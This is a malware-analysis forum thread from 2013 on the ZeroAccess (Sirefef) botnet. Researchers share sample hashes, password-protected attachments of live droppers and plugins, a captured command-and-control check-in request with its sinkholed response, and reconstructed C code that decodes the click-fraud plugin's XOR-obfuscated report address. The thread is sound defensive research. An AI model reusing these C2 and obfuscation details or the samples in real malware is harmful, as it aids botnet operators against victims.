A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18798  by rinn
 Mon Apr 01, 2013 5:03 pm
Hi.

They updated their dropper obfuscator several days ago, targeting msft generic detection :)

Best Regards,
-rin
 #18801  by EP_X0FF
 Mon Apr 01, 2013 6:39 pm
Well I'm looking on this BH EK host and here we go with another 99% FUD ZeroAccess. They re-crypt it each 2-3 hours, making sure it will be delivered to the victim computer FUD.

Detection ratio: 1 / 46

SHA256: 7401aa159dcac523471bd379c205bc8bc8a5ee191eb5dcb27362db1e3562c70d
SHA1: 4991e4e6aa2ec6a225ed34eb06d42e014508320a
MD5: 6c78b452b5dc30c373509acc9439eb79

https://www.virustotal.com/en/file/7401 ... 364841160/
Attachments
pass: infected
(159.7 KiB) Downloaded 67 times
 #18803  by EP_X0FF
 Tue Apr 02, 2013 4:08 am
ZeroAccess payload fetched from network just now. Include fresh compiled dll.

win32 Sirefef payload
  • 000000cb
  • 00000004
  • 00000008
  • 80000000
  • 80000032
SHA1
84d27814aa3734393d9739dea9db2058dd8ef486
61023a418c73264f0a514f93c39ada01391b6e15
a3aa67884223f3e8f8c52afdbc779dcb19ff00e6
97d178f9f9541e90c2a527c3ff97a43a1b69cb25
6e181f5c9031430d1c4f36b99779d4f9d51eb208

win64 Sirefef payload
  • 000000cb
  • 00000004
  • 00000008
  • 80000000
  • 80000032 (included for wow64 compatibility)
  • 80000064 (compiled 1 Apr 2013)
SHA1
b4182854f7531e4f363e641ebdba33e3d9dfa691
a03758c7daf6e246059c3eebaa67244615d037d4
061a3739739904f13a5b9adcbf4ac2e8a3157b18
46c1319ee38510c365a4226621de30bdf7e462ff
810e28d4e7b28d658dc48a82f0c65b46149aae89
2b4144391ab409ec1017691fe54b16b951e3ec4d
Attachments
pass: infected
(91.7 KiB) Downloaded 66 times
pass: infected
(53.33 KiB) Downloaded 67 times
 #18808  by EP_X0FF
 Tue Apr 02, 2013 12:19 pm
ZeroAccess HTTP request.
Code: Select all
GET /8QQUW7RVYqeIdj0xLjImaWQ9Mjk2ODIxOTkzJmFpZD0zMDU2MiZzaWQ9MCZvcz02LjEtNjQ=pmzuGI87 HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Language: ru-ru
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Tue, 02 Apr 2013 11:45:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
xlotxdxtorwfmvuzfuvtspel.com
Code: Select all
HTTP/1.1 200 OK
Date: Tue, 02 Apr 2013 12:14:41 GMT
Server: Apache
X-Sinkhole: malware-sinkhole
Content-Length: 0
Keep-Alive: timeout=1
Connection: Keep-Alive
Content-Type: text/html
Hi there :)
 #18811  by kmd
 Tue Apr 02, 2013 5:00 pm
@EP_X0FF

started reversing zeroaccess dlls and so far have a coupe of questions:

what is the purpose of 000000cb.@?
 #18812  by EP_X0FF
 Tue Apr 02, 2013 5:30 pm
As already mentioned few times, this is resource-only dll, used by Sirefef tracker plugin 80000000.@ (used to track click fraud by botnet operators). Inside in resources it contain IP address and port. The resource with pair IP+port, used to report click, id = 33000.

Here is some piece from reconstructed 80000000.@ code, should be self-explaining.
Code: Select all
NTSTATUS NTAPI SfGetGlobalTrackerData(PVOID DllHandle)
{
  NTSTATUS Status;
  IMAGE_RESOURCE_DATA_ENTRY ResourceDataEntry;
  SfTrackerData tmpTrackerData;

  Status = LdrFindResource_U(DllHandle, &SfTrkId, SfTrkIdLength, &ResourceDataEntry);
  if ( NT_SUCCESS(Status) )  {
    if ( ResourceDataEntry.Size == sizeof(SfTrackerData) ) {
      Status = LdrAccessResource(DllHandle, ResourceDataEntry, &tmpTrackerData, NULL);
      if ( NT_STATUS(Status) ) {        
        g_dwIP = tmpTrackerData.DataIp ^ 0x4E8F9AF4;
        g_wPort = tmpTrackerData.DataPort ^ 0xF5AD;
      }
    }
  }
  return Status;
}
As for the above Sirefef plugins, their operators and/or server seems located in Latvia.
 #18814  by EP_X0FF
 Tue Apr 02, 2013 5:50 pm
kmd wrote:so if we know where are they, isn't it the way to shutdown this botnet?
This idea is not new. Yes it is possible disrupt support infrastructure of botnet so customers of Sirefef will not know the state of their operations - making their money look just like digits on the screen. However we sure they have a plan "B" for this. Like already stated by Sophos counteracting to this will be just a question of plugins update. As long as all operators simultaneously not fall into the jail the above shutdown won't work.
 #18816  by r3shl4k1sh
 Tue Apr 02, 2013 8:11 pm
EP_X0FF wrote:ZeroAccess HTTP request.
Code: Select all
GET /8QQUW7RVYqeIdj0xLjImaWQ9Mjk2ODIxOTkzJmFpZD0zMDU2MiZzaWQ9MCZvcz02LjEtNjQ=pmzuGI87 HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Language: ru-ru
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Tue, 02 Apr 2013 11:45:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
xlotxdxtorwfmvuzfuvtspel.com
Code: Select all
HTTP/1.1 200 OK
Date: Tue, 02 Apr 2013 12:14:41 GMT
Server: Apache
[b]X-Sinkhole: malware-sinkhole[/b]
Content-Length: 0
Keep-Alive: timeout=1
Connection: Keep-Alive
Content-Type: text/html
Hi there :)
Do you believe it is true ?
I have seen that on other domain name used by ZA, and after a quick search on google i found it here: http://labs.snort.org/files/DomainTakedowns.pdf
This is a presentetion from VRT (source fire) which mention this X-Sinkhole.

But how am i can be sure that it is really sinkholed?
 #18817  by EP_X0FF
 Wed Apr 03, 2013 2:44 am
r3shl4k1sh wrote:Do you believe it is true ?
I have seen that on other domain name used by ZA, and after a quick search on google i found it here: http://labs.snort.org/files/DomainTakedowns.pdf
This is a presentetion from VRT (source fire) which mention this X-Sinkhole.

But how am i can be sure that it is really sinkholed?
Yes I believe it is true and belongs to Georgia Institute of Technology. From list of domains in Sirefef three of them belongs to this sinkhole.

Quick googling of 50.62.12.103 address revealed Flashback, Ramnit and MultiBanker (http://virustracker.info/text/MultiBank ... Others.txt).
  • 1
  • 36
  • 37
  • 38
  • 39
  • 40
  • 56